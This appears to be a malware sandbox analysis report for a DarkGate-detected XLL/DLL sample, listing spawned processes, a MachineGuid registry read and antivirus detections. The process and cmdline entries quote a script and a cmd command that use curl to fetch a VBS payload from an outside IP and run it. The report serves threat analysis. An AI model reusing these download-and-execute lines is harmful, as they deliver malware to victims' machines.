Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 23, 2023, 6:56 p.m. | Sept. 23, 2023, 6:58 p.m. |
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xlAutoOpen
2560-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xlAutoOpen
2792-
me.exe C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
2908-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\users\public\1.vbs
908
-
-
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xor_decrypt
2644-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xor_decrypt
2832
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,
2736
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\users\public\1.vbs |
Bkav | W32.AIDetectMalware.64 |
Lionic | Trojan.Win32.Alien.4!c |
MicroWorld-eScan | Trojan.GenericKD.69405985 |
FireEye | Trojan.GenericKD.69405985 |
McAfee | Artemis!F1B91FDBCD06 |
Malwarebytes | Trojan.DarkGate |
Arcabit | Trojan.Generic.D4230D21 |
Cyren | W64/ABRisk.NHKN-7036 |
Symantec | Trojan Horse |
ESET-NOD32 | a variant of Win64/Agent.CWT |
Cynet | Malicious (score: 99) |
Kaspersky | Trojan.Win64.Alien.bzk |
BitDefender | Trojan.GenericKD.69405985 |
Avast | MalwareX-gen [Trj] |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Agent.uutvu |
VIPRE | Trojan.GenericKD.69407119 |
TrendMicro | Trojan.Win64.DARKGATE.YXDIVZ |
McAfee-GW-Edition | BehavesLike.Win64.Infected.qm |
Emsisoft | Trojan.GenericKD.69405985 (B) |
Webroot | W32.Trojan.Gen |
Avira | TR/Agent.uutvu |
Antiy-AVL | Trojan/Win64.Alien |
Microsoft | Trojan:Win64/Tedy.GPB!MTB |
ZoneAlarm | Trojan.Win64.Alien.bzk |
GData | Trojan.GenericKD.69405985 |
Detected | |
AhnLab-V3 | Dropper/Win.Generic.R606770 |
ALYac | Trojan.GenericKD.69407119 |
MAX | malware (ai score=88) |
Cylance | unsafe |
Panda | Trj/Chgt.AD |
TrendMicro-HouseCall | Trojan.Win64.DARKGATE.YXDIVZ |
Rising | Downloader.Agent!8.B23 (TFE:6:OmxMTTXvMrN) |
Ikarus | Win32.Outbreak |
AVG | MalwareX-gen [Trj] |
DeepInstinct | MALICIOUS |